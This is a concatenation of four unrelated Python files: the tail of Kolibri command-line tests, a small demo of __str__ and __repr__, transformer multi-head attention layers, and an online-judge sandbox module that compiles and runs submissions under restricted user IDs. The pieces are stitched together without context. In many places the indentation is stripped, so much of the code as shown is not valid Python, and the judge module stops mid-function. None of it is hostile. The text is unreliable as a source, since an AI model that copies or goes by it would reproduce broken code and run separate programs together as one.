"""
Tests that the first_run() function performs as expected
"""
cli.initialize()
update.assert_called_once()
dbbackup.assert_not_called()
# Check that it got called for each default plugin
from kolibri import plugins
assert set(plugins.config["INSTALLED_PLUGINS"]) == set(plugins.DEFAULT_PLUGINS)
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="0.0.1")
@patch("kolibri.utils.cli.update")
def test_update(update, get_version):
"""
Tests that update() function performs as expected
"""
cli.initialize()
update.assert_called_once()
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="0.0.1")
def test_update_exits_if_running(get_version):
"""
    Tests that initialize() exits when the server is already running
"""
with patch("kolibri.utils.cli.server.get_status"):
try:
cli.initialize()
pytest.fail("Update did not exit when Kolibri was already running")
except SystemExit:
pass
@pytest.mark.django_db
def test_version_updated():
"""
Tests our db backup logic: version_updated gets any change, backup gets only non-dev changes
"""
assert cli.version_updated("0.10.0", "0.10.1")
assert not cli.version_updated("0.10.0", "0.10.0")
assert not cli.should_back_up("0.10.0-dev0", "")
assert not cli.should_back_up("0.10.0-dev0", "0.10.0")
assert not cli.should_back_up("0.10.0", "0.10.0-dev0")
assert not cli.should_back_up("0.10.0-dev0", "0.10.0-dev0")
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value=kolibri.__version__)
@patch("kolibri.utils.cli.update")
@patch("kolibri.core.deviceadmin.utils.dbbackup")
def test_update_no_version_change(dbbackup, update, get_version):
"""
Tests that when the version doesn't change, we are not doing things we
shouldn't
"""
cli.initialize()
update.assert_not_called()
dbbackup.assert_not_called()
def test_cli_usage():
# Test the -h
with pytest.raises(SystemExit) as excinfo:
cli.main("-h")
    assert excinfo.value.code == 0
with pytest.raises(SystemExit) as excinfo:
cli.main("--version")
    assert excinfo.value.code == 0
@patch("kolibri.utils.cli.click.echo")
def test_list_plugins(echo_mock, plugins):
cli.list.callback()
test_plugin = "kolibri.plugins.media_player"
    assert any(
        map(
            lambda x: test_plugin in x[0] and "ENABLED" in x[0],
            echo_mock.call_args_list,
        )
    )
@patch("kolibri.utils.cli.click.echo")
def test_list_plugins_disabled(echo_mock, plugins):
    test_plugin = "kolibri.plugins.media_player"
    cli.disable.callback((test_plugin,), False)
    cli.list.callback()
    assert any(
        map(
            lambda x: test_plugin in x[0] and "DISABLED" in x[0],
            echo_mock.call_args_list,
        )
    )
@patch("kolibri.utils.cli._migrate_databases")
@patch("kolibri.utils.cli.version_updated")
def test_migrate_if_unmigrated(version_updated, _migrate_databases):
# No matter what, ensure that version_updated returns False
version_updated.return_value = False
from morango.models import InstanceIDModel
with patch.object(
InstanceIDModel, "get_or_create_current_instance"
) as get_or_create_current_instance:
get_or_create_current_instance.side_effect = OperationalError("Test")
cli.initialize()
_migrate_databases.assert_called_once()
|
class Person:
name='zhangsan'
age=20
p = Person()
print(p) # <__main__.Person object at 0x10073e668>
print('⭐️ ' * 20)
class Stu:
name='zhangsan'
age=20
def __str__(self):
return "name: %s; age: %d"%(self.name, self.age)
s = Stu()
print(s) # name: zhangsan; age: 20
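# Note (added for illustration): when __str__ is missing, print() falls back
# to __repr__, so defining __repr__ alone also changes the printed form.
class Teacher:
    name = 'lisi'
    def __repr__(self):
        return "Teacher(name=%s)" % self.name
t = Teacher()
print(t)  # Teacher(name=lisi)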
|
""" Define the sublayers in encoder/decoder layer """
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class ScaledDotProductAttention(nn.Module):
""" Scaled Dot-Product Attention """
    def __init__(self, temperature, attn_dropout=0.1):
        super().__init__()
        self.temperature = temperature
        self.dropout = nn.Dropout(attn_dropout)
    def forward(self, q, k, v, mask=None):
        # Scale by the temperature (sqrt(d_k)) supplied at construction.
        attn = torch.matmul(q / self.temperature, k.transpose(2, 3))
        if mask is not None:
            attn = attn.masked_fill(mask == 0, -1e9)
        attn = self.dropout(F.softmax(attn, dim=-1))
        output = torch.matmul(attn, v)
        return output, attn
class MultiHeadAttention(nn.Module):
""" Multi-Head Attention module """
def __init__(self, n_head, d_model, d_k, d_v, dropout=0.1):
super().__init__()
self.n_head = n_head
self.d_k = d_k
self.d_v = d_v
self.w_qs = nn.Linear(d_model, n_head * d_k, bias=False)
self.w_ks = nn.Linear(d_model, n_head * d_k, bias=False)
self.w_vs = nn.Linear(d_model, n_head * d_v, bias=False)
self.fc = nn.Linear(n_head * d_v, d_model, bias=False)
self.attention = ScaledDotProductAttention(temperature=d_k ** 0.5)
self.dropout = nn.Dropout(dropout)
self.layer_norm = nn.LayerNorm(d_model, eps=1e-6)
def forward(self, q, k, v, mask=None):
d_k, d_v, n_head = self.d_k, self.d_v, self.n_head
sz_b, len_q, len_k, len_v = q.size(0), q.size(1), k.size(1), v.size(1)
residual = q
# Pass through the pre-attention projection: b x lq x (n*dv)
# Separate different heads: b x lq x n x dv
q = self.w_qs(q).view(sz_b, len_q, n_head, d_k)
k = self.w_ks(k).view(sz_b, len_k, n_head, d_k)
v = self.w_vs(v).view(sz_b, len_v, n_head, d_v)
# Transpose for attention dot product: b x n x lq x dv
q, k, v = q.transpose(1, 2), k.transpose(1, 2), v.transpose(1, 2)
if mask is not None:
mask = mask.unsqueeze(1) # For head axis broadcasting.
q, attn = self.attention(q, k, v, mask=mask)
# Transpose to move the head dimension back: b x lq x n x dv
# Combine the last two dimensions to concatenate all the heads together: b x lq x (n*dv)
q = q.transpose(1, 2).contiguous().view(sz_b, len_q, -1)
q = self.dropout(self.fc(q))
q += residual
q = self.layer_norm(q)
return q, attn
class PositionwiseFeedForward(nn.Module):
""" A two-feed-forward-layer module """
def __init__(self, d_in, d_hid, dropout=0.1):
super().__init__()
self.w_1 = nn.Linear(d_in, d_hid) # position-wise
self.w_2 = nn.Linear(d_hid, d_in) # position-wise
self.layer_norm = nn.LayerNorm(d_in, eps=1e-6)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
residual = x
x = self.w_2(F.relu(self.w_1(x)))
x = self.dropout(x)
x += residual
x = self.layer_norm(x)
return x
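# --- Usage sketch (added for illustration; not part of the original file) ---
# A minimal smoke test of MultiHeadAttention with assumed, illustrative
# hyperparameters (n_head=8, d_model=512, d_k=d_v=64) and random inputs.
if __name__ == '__main__':
    mha = MultiHeadAttention(n_head=8, d_model=512, d_k=64, d_v=64)
    x = torch.rand(2, 10, 512)  # (batch, seq_len, d_model)
    out, attn = mha(x, x, x)    # self-attention: q = k = v
    print(out.shape, attn.shape)  # torch.Size([2, 10, 512]) torch.Size([2, 8, 10, 10])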
|
'''Standard challenge module.'''
import os
import shutil
import fcntl
from cffi import FFI
from tornado import gen, concurrent, process
from tornado.stack_context import StackContext
from tornado.ioloop import IOLoop
import PyExt
import Privilege
import Config
from Utils import FileUtils
STATUS_NONE = 0
STATUS_AC = 1
STATUS_WA = 2
STATUS_RE = 3
STATUS_TLE = 4
STATUS_MLE = 5
STATUS_CE = 6
STATUS_ERR = 7
MS_BIND = 4096
class StdChal:
'''Standard challenge.
Static attributes:
last_uniqid (int): Last ID.
last_standard_uid (int): Last UID for standard tasks.
last_restrict_uid (int): Last UID for restricted tasks.
null_fd (int): File descriptor of /dev/null.
build_cache (dict): Cache information of builds.
build_cache_refcount (dict): Refcount of build caches.
Attributes:
uniqid (int): Unique ID.
code_path (string): Code path.
res_path (string): Resource path.
comp_typ (string): Type of compile.
judge_typ (string): Type of judge.
test_list ([dict]): Test parameter lists.
metadata (dict): Metadata for judge.
chal_id (int): Challenge ID.
chal_path (string): Challenge path.
'''
last_uniqid = 0
last_standard_uid = Config.CONTAINER_STANDARD_UID_BASE
last_restrict_uid = Config.CONTAINER_RESTRICT_UID_BASE
null_fd = None
@staticmethod
def init():
'''Initialize the module.'''
with StackContext(Privilege.fileaccess):
try:
shutil.rmtree('container/standard/home')
except FileNotFoundError:
pass
os.mkdir('container/standard/home', mode=0o771)
try:
shutil.rmtree('container/standard/cache')
except FileNotFoundError:
pass
os.mkdir('container/standard/cache', mode=0o771)
ffi = FFI()
ffi.cdef('''int mount(const char source[], const char target[],
const char filesystemtype[], unsigned long mountflags,
const void *data);''')
ffi.cdef('''int umount(const char *target);''')
libc = ffi.dlopen('libc.so.6')
with StackContext(Privilege.fullaccess):
libc.umount(b'container/standard/dev')
libc.mount(b'/dev', b'container/standard/dev', b'', MS_BIND, \
ffi.NULL)
StdChal.null_fd = os.open('/dev/null', os.O_RDWR | os.O_CLOEXEC)
StdChal.build_cache = {}
StdChal.build_cache_refcount = {}
@staticmethod
def get_standard_ugid():
'''Generate standard UID/GID.
Returns:
(int, int): Standard UID/GID
'''
StdChal.last_standard_uid += 1
return (StdChal.last_standard_uid, StdChal.last_standard_uid)
@staticmethod
def get_restrict_ugid():
'''Generate restrict UID/GID.
Returns:
(int, int): Restrict UID/GID
'''
StdChal.last_restrict_uid += 1
return (StdChal.last_restrict_uid, StdChal.last_restrict_uid)
@staticmethod
def build_cache_find(res_path):
'''Get build cache.
Args:
res_path (string): Resource path.
Returns:
(string, int): (cache hash, GID) or None if not found.
'''
try:
return StdChal.build_cache[res_path]
except KeyError:
return None
@staticmethod
def build_cache_update(res_path, cache_hash, gid):
'''Update build cache.
Args:
res_path (string): Resource path.
cache_hash (int): Cache hash.
gid (int): GID.
Returns:
None
'''
ret = StdChal.build_cache_find(res_path)
if ret is not None:
StdChal.build_cache_decref(ret[0])
del StdChal.build_cache[res_path]
StdChal.build_cache[res_path] = (cache_hash, gid)
StdChal.build_cache_refcount[cache_hash] = 1
@staticmethod
def build_cache_incref(cache_hash):
'''Increment the refcount of the build cache.
Args:
cache_hash (int): Cache hash.
Returns:
None
'''
StdChal.build_cache_refcount[cache_hash] += 1
@staticmethod
def build_cache_decref(cache_hash):
'''Decrement the refcount of the build cache.
Delete the build cache if the refcount = 0.
Args:
cache_hash (int): Cache hash.
Returns:
None
'''
StdChal.build_cache_refcount[cache_hash] -= 1
if StdChal.build_cache_refcount[cache_hash] == 0:
with StackContext(Privilege.fileaccess):
shutil.rmtree('container/standard/cache/%x'%cache_hash)
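    # Typical cache lifecycle (illustrative summary, derived from start()):
    # build_cache_update() registers a freshly built checker with refcount 1,
    # each challenge that reuses it calls build_cache_incref() before judging
    # and build_cache_decref() during cleanup, so the cache directory is
    # removed only once no challenge references it.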
def __init__(self, chal_id, code_path, comp_typ, judge_typ, res_path, \
test_list, metadata):
'''Initialize.
Args:
chal_id (int): Challenge ID.
code_path (string): Code path.
comp_typ (string): Type of compile.
judge_typ (string): Type of judge.
res_path (string): Resource path.
test_list ([dict]): Test parameter lists.
metadata (dict): Metadata for judge.
'''
StdChal.last_uniqid += 1
self.uniqid = StdChal.last_uniqid
self.code_path = code_path
self.res_path = res_path
self.comp_typ = comp_typ
self.judge_typ = judge_typ
self.test_list = test_list
self.metadata = metadata
self.chal_id = chal_id
self.chal_path = None
        self.compile_uid, self.compile_gid = StdChal.get_standard_ugid()
@gen.coroutine
def prefetch(self):
'''Prefetch files.'''
path_set = set([self.code_path])
for root, _, files in os.walk(self.res_path):
for filename in files:
path_set.add(os.path.abspath(os.path.join(root, filename)))
path_list = list(path_set)
proc_list = []
with StackContext(Privilege.fileaccess):
for idx in range(0, len(path_list), 16):
proc_list.append(process.Subprocess(
['./Prefetch.py'] + path_list[idx:idx + 16],
stdout=process.Subprocess.STREAM))
for proc in proc_list:
yield proc.stdout.read_bytes(2)
@gen.coroutine
def start(self):
'''Start the challenge.
Returns:
            list: List of (runtime, peakmem, status, verdict) tuples, one per test.
'''
cache_hash = None
cache_gid = None
# Check if special judge needs to rebuild.
if self.judge_typ in ['ioredir']:
hashproc = process.Subprocess( \
['./HashDir.py', self.res_path + '/check'], \
stdout=process.Subprocess.STREAM)
dirhash = yield hashproc.stdout.read_until(b'\n')
dirhash = int(dirhash.decode('utf-8').rstrip('\n'), 16)
ret = StdChal.build_cache_find(self.res_path)
if ret is not None and ret[0] == dirhash:
cache_hash, cache_gid = ret
judge_ioredir = IORedirJudge('container/standard', \
'/cache/%x'%cache_hash)
else:
cache_hash = dirhash
_, cache_gid = StdChal.get_standard_ugid()
build_ugid = StdChal.get_standard_ugid()
build_relpath = '/cache/%x'%cache_hash
build_path = 'container/standard' + build_relpath
judge_ioredir = IORedirJudge('container/standard', \
build_relpath)
if not (yield judge_ioredir.build(build_ugid, self.res_path)):
                    return [(0, 0, STATUS_ERR, '')] * len(self.test_list)
FileUtils.setperm(build_path, \
Privilege.JUDGE_UID, cache_gid, umask=0o750)
with StackContext(Privilege.fullaccess):
os.chmod(build_path, 0o750)
StdChal.build_cache_update(self.res_path, cache_hash, cache_gid)
print('StdChal %d built checker %x'%(self.chal_id, cache_hash))
StdChal.build_cache_incref(cache_hash)
print('StdChal %d started'%self.chal_id)
# Create challenge environment.
self.chal_path = 'container/standard/home/%d'%self.uniqid
with StackContext(Privilege.fileaccess):
os.mkdir(self.chal_path, mode=0o771)
try:
yield self.prefetch()
print('StdChal %d prefetched'%self.chal_id)
if self.comp_typ in ['g++', 'clang++']:
ret, verdict = yield self.comp_cxx()
elif self.comp_typ == 'makefile':
ret, verdict = yield self.comp_make()
elif self.comp_typ == 'python3':
ret, verdict = yield self.comp_python()
if ret != PyExt.DETECT_NONE:
return [(0, 0, STATUS_CE, verdict)] * len(self.test_list)
print('StdChal %d compiled'%self.chal_id)
# Prepare test arguments
if self.comp_typ == 'python3':
exefile_path = self.chal_path \
                    + '/compile/__pycache__/test.cpython-35.pyc'
exe_path = '/usr/bin/python3.5'
argv = ['./a.out']
envp = ['HOME=/', 'LANG=en_US.UTF-8']
else:
exefile_path = self.chal_path + '/compile/a.out'
exe_path = './a.out'
argv = []
envp = []
# Prepare judge
test_future = []
if self.judge_typ == 'diff':
for test in self.test_list:
test_future.append(self.judge_diff(
exefile_path,
exe_path, argv, envp,
test['in'], test['ans'],
test['timelimit'], test['memlimit']))
elif self.judge_typ == 'ioredir':
for test in self.test_list:
check_uid, _ = StdChal.get_standard_ugid()
test_uid, test_gid = StdChal.get_restrict_ugid()
test_future.append(judge_ioredir.judge( \
exefile_path, exe_path, argv, envp, \
(check_uid, cache_gid), \
(test_uid, test_gid), \
'/home/%d/run_%d'%(self.uniqid, test_uid), \
test, self.metadata))
# Emit tests
test_result = yield gen.multi(test_future)
ret_result = list()
for result in test_result:
test_pass, data, verdict = result
runtime, peakmem, error = data
status = STATUS_ERR
if error == PyExt.DETECT_NONE:
if test_pass is True:
status = STATUS_AC
else:
status = STATUS_WA
elif error == PyExt.DETECT_OOM:
status = STATUS_MLE
elif error == PyExt.DETECT_TIMEOUT \
or error == PyExt.DETECT_FORCETIMEOUT:
status = STATUS_TLE
elif error == PyExt.DETECT_EXITERR:
status = STATUS_RE
else:
status = STATUS_ERR
ret_result.append((runtime, peakmem, status, verdict))
return ret_result
finally:
if cache_hash is not None:
StdChal.build_cache_decref(cache_hash)
with StackContext(Privilege.fileaccess):
shutil.rmtree(self.chal_path)
print('StdChal %d done'%self.chal_id)
@concurrent.return_future
def comp_cxx(self, callback=None):
'''GCC, Clang compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal errpipe_fd
os.close(errpipe_fd)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal compile_path
with StackContext(Privilege.fileaccess):
verfile = open(compile_path + '/verdict.txt', 'rb')
            # Convert the bytes to str byte-by-byte to avoid decoding
            # errors on truncated multi-byte UTF-8 sequences.
verdict = ''.join(chr(c) for c in verfile.read(140))
verfile.close()
callback((stat['detect_error'], verdict))
compile_path = self.chal_path + '/compile'
with StackContext(Privilege.fileaccess):
os.mkdir(compile_path, mode=0o770)
shutil.copyfile(self.code_path, compile_path + '/test.cpp', \
follow_symlinks=False)
FileUtils.setperm(compile_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fileaccess):
errpipe_fd = os.open(compile_path + '/verdict.txt', \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o440)
if self.comp_typ == 'g++':
compiler = '/usr/bin/g++'
elif self.comp_typ == 'clang++':
compiler = '/usr/bin/clang++'
task_id = PyExt.create_task(compiler, \
[
'-O2',
'-std=c++14',
'-o', './a.out',
'./test.cpp',
], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=/home/%d/compile'%self.uniqid,
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: errpipe_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
os.close(errpipe_fd)
callback((PyExt.DETECT_INTERNALERR, ''))
return
PyExt.start_task(task_id, _done_cb, _started_cb)
@concurrent.return_future
def comp_make(self, callback=None):
'''Makefile compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
callback((stat['detect_error'], ''))
make_path = self.chal_path + '/compile'
FileUtils.copydir(self.res_path + '/make', make_path)
with StackContext(Privilege.fileaccess):
shutil.copyfile(self.code_path, make_path + '/main.cpp', \
follow_symlinks=False)
FileUtils.setperm(make_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fullaccess):
os.chmod(make_path, mode=0o770)
task_id = PyExt.create_task('/usr/bin/make', \
[], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=/home/%d/compile'%self.uniqid,
'OUT=./a.out',
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
callback((PyExt.DETECT_INTERNALERR, ''))
else:
PyExt.start_task(task_id, _done_cb)
@concurrent.return_future
def comp_python(self, callback=None):
        '''Python3.5 compile.
Args:
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal errpipe_fd
os.close(errpipe_fd)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal compile_path
with StackContext(Privilege.fileaccess):
verfile = open(compile_path + '/verdict.txt', 'rb')
            # Convert the bytes to str byte-by-byte to avoid decoding
            # errors on truncated multi-byte UTF-8 sequences.
verdict = ''.join(chr(c) for c in verfile.read(140))
verfile.close()
callback((stat['detect_error'], verdict))
compile_path = self.chal_path + '/compile'
with StackContext(Privilege.fileaccess):
os.mkdir(compile_path, mode=0o770)
shutil.copyfile(self.code_path, compile_path + '/test.py', \
follow_symlinks=False)
FileUtils.setperm(compile_path, self.compile_uid, self.compile_gid)
with StackContext(Privilege.fileaccess):
errpipe_fd = os.open(compile_path + '/verdict.txt', \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o440)
task_id = PyExt.create_task('/usr/bin/python3.5', \
[
'-m',
'py_compile',
'./test.py'
], \
[
'HOME=/home/%d/compile'%self.uniqid,
'LANG=en_US.UTF-8'
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: errpipe_fd,
}, \
'/home/%d/compile'%self.uniqid, 'container/standard', \
self.compile_uid, self.compile_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
os.close(errpipe_fd)
callback((PyExt.DETECT_INTERNALERR, ''))
return
PyExt.start_task(task_id, _done_cb, _started_cb)
@concurrent.return_future
def judge_diff(self, src_path, exe_path, argv, envp, in_path, ans_path, \
timelimit, memlimit, callback=None):
'''Diff judge.
Args:
src_path (string): Executable source path.
exe_path (string): Executable or interpreter path in the sandbox.
argv ([string]): List of arguments.
envp ([string]): List of environment variables.
in_path (string): Input file path.
ans_path (string): Answer file path.
timelimit (int): Timelimit.
memlimit (int): Memlimit.
callback (function): Callback of return_future.
Returns:
None
'''
def _started_cb(task_id):
'''Started callback.
Close unused file descriptors after the task is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal infile_fd
nonlocal outpipe_fd
os.close(infile_fd)
os.close(outpipe_fd[1])
IOLoop.instance().add_handler(outpipe_fd[0], _diff_out, \
IOLoop.READ | IOLoop.ERROR)
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_stat
nonlocal result_pass
result_stat = (stat['utime'], stat['peakmem'], stat['detect_error'])
if result_pass is not None:
callback((result_pass, result_stat, ''))
def _diff_out(evfd, events):
'''Diff the output of the task.
Args:
evfd (int): Event file descriptor.
events (int): Event flags.
Returns:
None
'''
nonlocal outpipe_fd
nonlocal ansfile
nonlocal result_stat
nonlocal result_pass
end_flag = False
if events & IOLoop.READ:
while True:
try:
data = os.read(outpipe_fd[0], 65536)
except BlockingIOError:
break
ansdata = ansfile.read(len(data))
if data != ansdata:
result_pass = False
end_flag = True
break
if len(ansdata) == 0:
if len(ansfile.read(1)) == 0:
result_pass = True
else:
result_pass = False
end_flag = True
break
if (events & IOLoop.ERROR) or end_flag:
if result_pass is None:
if len(ansfile.read(1)) == 0:
result_pass = True
else:
result_pass = False
IOLoop.instance().remove_handler(evfd)
os.close(outpipe_fd[0])
ansfile.close()
if result_stat is not None:
callback((result_pass, result_stat, ''))
judge_uid, judge_gid = StdChal.get_restrict_ugid()
# Prepare I/O and stat.
with StackContext(Privilege.fileaccess):
infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
ansfile = open(ans_path, 'rb')
outpipe_fd = os.pipe2(os.O_CLOEXEC)
fcntl.fcntl(outpipe_fd[0], fcntl.F_SETFL, os.O_NONBLOCK)
result_stat = None
result_pass = None
# Prepare judge environment.
with StackContext(Privilege.fileaccess):
judge_path = self.chal_path + '/run_%d'%judge_uid
os.mkdir(judge_path, mode=0o771)
shutil.copyfile(src_path, judge_path + '/a.out', \
follow_symlinks=False)
with StackContext(Privilege.fullaccess):
os.chown(judge_path + '/a.out', judge_uid, judge_gid)
os.chmod(judge_path + '/a.out', 0o500)
task_id = PyExt.create_task(exe_path, argv, envp, \
{
0: infile_fd,
1: outpipe_fd[1],
2: outpipe_fd[1],
}, \
'/home/%d/run_%d'%(self.uniqid, judge_uid), 'container/standard', \
judge_uid, judge_gid, timelimit, memlimit, \
PyExt.RESTRICT_LEVEL_HIGH)
if task_id is None:
os.close(infile_fd)
os.close(outpipe_fd[0])
os.close(outpipe_fd[1])
ansfile.close()
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
else:
PyExt.start_task(task_id, _done_cb, _started_cb)
class IORedirJudge:
    '''I/O redirect special judge.
Attributes:
container_path (string): Container path.
build_relpath (string): Relative build path.
build_path (string): Build path.
'''
def __init__(self, container_path, build_relpath):
'''Initialize.
Args:
container_path (string): Container path.
build_relpath (string): Relative build path.
'''
self.container_path = container_path
self.build_relpath = build_relpath
self.build_path = container_path + build_relpath
@concurrent.return_future
def build(self, build_ugid, res_path, callback=None):
'''Build environment.
Args:
build_ugid ((int, int)): Build UID/GID.
res_path (string): Resource path.
callback (function): Callback of return_future.
Returns:
None
'''
def _done_cb(task_id, stat):
'''Done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
if stat['detect_error'] == PyExt.DETECT_NONE:
callback(True)
else:
callback(False)
build_uid, build_gid = build_ugid
# Prepare build environment.
FileUtils.copydir(res_path + '/check', self.build_path)
FileUtils.setperm(self.build_path, build_uid, build_gid)
with StackContext(Privilege.fullaccess):
os.chmod(self.build_path, mode=0o770)
with StackContext(Privilege.fileaccess):
if not os.path.isfile(self.build_path + '/build'):
callback(True)
return
# Make the build file executable.
with StackContext(Privilege.fullaccess):
os.chmod(self.build_path + '/build', mode=0o770)
# Build.
task_id = PyExt.create_task(self.build_relpath + '/build', \
[], \
[
'PATH=/usr/bin:/bin',
'TMPDIR=%s'%self.build_relpath,
'HOME=%s'%self.build_relpath,
'LANG=en_US.UTF-8'
], \
{
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}, \
self.build_relpath, 'container/standard', \
build_uid, build_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if task_id is None:
callback(False)
else:
PyExt.start_task(task_id, _done_cb)
@concurrent.return_future
def judge(self, src_path, exe_relpath, argv, envp, check_ugid, test_ugid, \
test_relpath, test_param, metadata, callback=None):
'''I/O redirect special judge.
Args:
src_path (string): Executable source path.
exe_relpath (string): Executable or interpreter path in the sandbox.
argv ([string]): List of arguments.
envp ([string]): List of environment variables.
check_ugid (int, int): Check UID/GID.
test_ugid (int, int): Test UID/GID.
test_relpath (string): Test relative path.
test_param (dict): Test parameters.
metadata (dict): Metadata.
callback (function): Callback of return_future.
Returns:
None
'''
def _check_started_cb(task_id):
'''Check started callback.
Close unused file descriptors after the check is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal inpipe_fd
nonlocal outpipe_fd
nonlocal ansfile_fd
nonlocal check_infile_fd
os.close(inpipe_fd[1])
os.close(outpipe_fd[0])
if ansfile_fd is not None:
os.close(ansfile_fd)
if check_infile_fd is not None:
os.close(check_infile_fd)
def _test_started_cb(task_id):
'''Test started callback.
Close unused file descriptors after the test is started.
Args:
task_id (int): Task ID.
Returns:
None
'''
nonlocal inpipe_fd
nonlocal outpipe_fd
nonlocal outfile_fd
nonlocal test_infile_fd
os.close(inpipe_fd[0])
os.close(outpipe_fd[1])
os.close(outfile_fd)
if test_infile_fd is not None:
os.close(test_infile_fd)
def _done_cb():
'''Done callback.'''
nonlocal result_stat
nonlocal result_pass
nonlocal verdict_path
if result_pass is not None and result_stat is not None:
with StackContext(Privilege.fileaccess):
verfile = open(verdict_path, 'r')
verdict = verfile.read(140)
verfile.close()
callback((result_pass, result_stat, verdict))
return
def _check_done_cb(task_id, stat):
'''Check done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_pass
if stat['detect_error'] == PyExt.DETECT_NONE:
result_pass = True
else:
result_pass = False
_done_cb()
def _test_done_cb(task_id, stat):
'''Test done callback.
Args:
task_id (int): Task ID.
stat (dict): Task result.
Returns:
None
'''
nonlocal result_stat
result_stat = (stat['utime'], stat['peakmem'], stat['detect_error'])
_done_cb()
result_stat = None
result_pass = None
in_path = test_param['in']
ans_path = test_param['ans']
timelimit = test_param['timelimit']
memlimit = test_param['memlimit']
check_uid, check_gid = check_ugid
test_uid, test_gid = test_ugid
test_path = self.container_path + test_relpath
output_relpath = test_relpath + '/output.txt'
output_path = self.container_path + output_relpath
verdict_relpath = test_relpath + '/verdict.txt'
verdict_path = self.container_path + verdict_relpath
# Prepare test environment.
with StackContext(Privilege.fileaccess):
os.mkdir(test_path, mode=0o771)
shutil.copyfile(src_path, test_path + '/a.out', \
follow_symlinks=False)
with StackContext(Privilege.fullaccess):
os.chown(test_path + '/a.out', test_uid, test_gid)
os.chmod(test_path + '/a.out', 0o500)
# Prepare I/O.
with StackContext(Privilege.fileaccess):
try:
check_infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
test_infile_fd = os.open(in_path, os.O_RDONLY | os.O_CLOEXEC)
except (FileNotFoundError, TypeError):
check_infile_fd = None
test_infile_fd = None
try:
ansfile_fd = os.open(ans_path, os.O_RDONLY | os.O_CLOEXEC)
except (FileNotFoundError, TypeError):
ansfile_fd = None
outfile_fd = os.open(output_path, \
os.O_WRONLY | os.O_CREAT | os.O_CLOEXEC, mode=0o400)
os.close(os.open(verdict_path,
os.O_CREAT | os.O_CLOEXEC, mode=0o640))
with StackContext(Privilege.fullaccess):
os.chown(output_path, check_uid, check_gid)
os.chown(verdict_path, check_uid, check_gid)
inpipe_fd = os.pipe2(os.O_CLOEXEC)
outpipe_fd = os.pipe2(os.O_CLOEXEC)
# Set file descriptor mapping.
check_fdmap = {
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}
test_fdmap = {
0: StdChal.null_fd,
1: StdChal.null_fd,
2: StdChal.null_fd,
}
if check_infile_fd is not None:
check_fdmap[metadata['redir_check']['testin']] = check_infile_fd
if ansfile_fd is not None:
check_fdmap[metadata['redir_check']['ansin']] = ansfile_fd
check_fdmap[metadata['redir_check']['pipein']] = inpipe_fd[1]
check_fdmap[metadata['redir_check']['pipeout']] = outpipe_fd[0]
try:
del check_fdmap[-1]
except KeyError:
pass
if test_infile_fd is not None:
test_fdmap[metadata['redir_test']['testin']] = test_infile_fd
test_fdmap[metadata['redir_test']['testout']] = outfile_fd
test_fdmap[metadata['redir_test']['pipein']] = inpipe_fd[0]
test_fdmap[metadata['redir_test']['pipeout']] = outpipe_fd[1]
try:
del test_fdmap[-1]
except KeyError:
pass
check_task_id = PyExt.create_task(self.build_relpath + '/check', \
[], \
[
'PATH=/usr/bin:/bin',
'HOME=%s'%self.build_relpath,
'LANG=en_US.UTF-8',
'OUTPUT=%s'%output_relpath,
'VERDICT=%s'%verdict_relpath,
], \
check_fdmap, \
self.build_relpath, self.container_path, \
check_uid, check_gid, 60000, 1024 * 1024 * 1024, \
PyExt.RESTRICT_LEVEL_LOW)
if check_task_id is None:
callback((False, (0, 0, PyExt.DETECT_INTERNALERR), ''))
return
PyExt.start_task(check_task_id, _check_done_cb, _check_started_cb)
test_task_id = PyExt.create_task(exe_relpath, argv, envp, \
test_fdmap, \
test_relpath, self.container_path, \
test_uid, test_gid, timelimit, memlimit, \
PyExt.RESTRICT_LEVEL_HIGH)
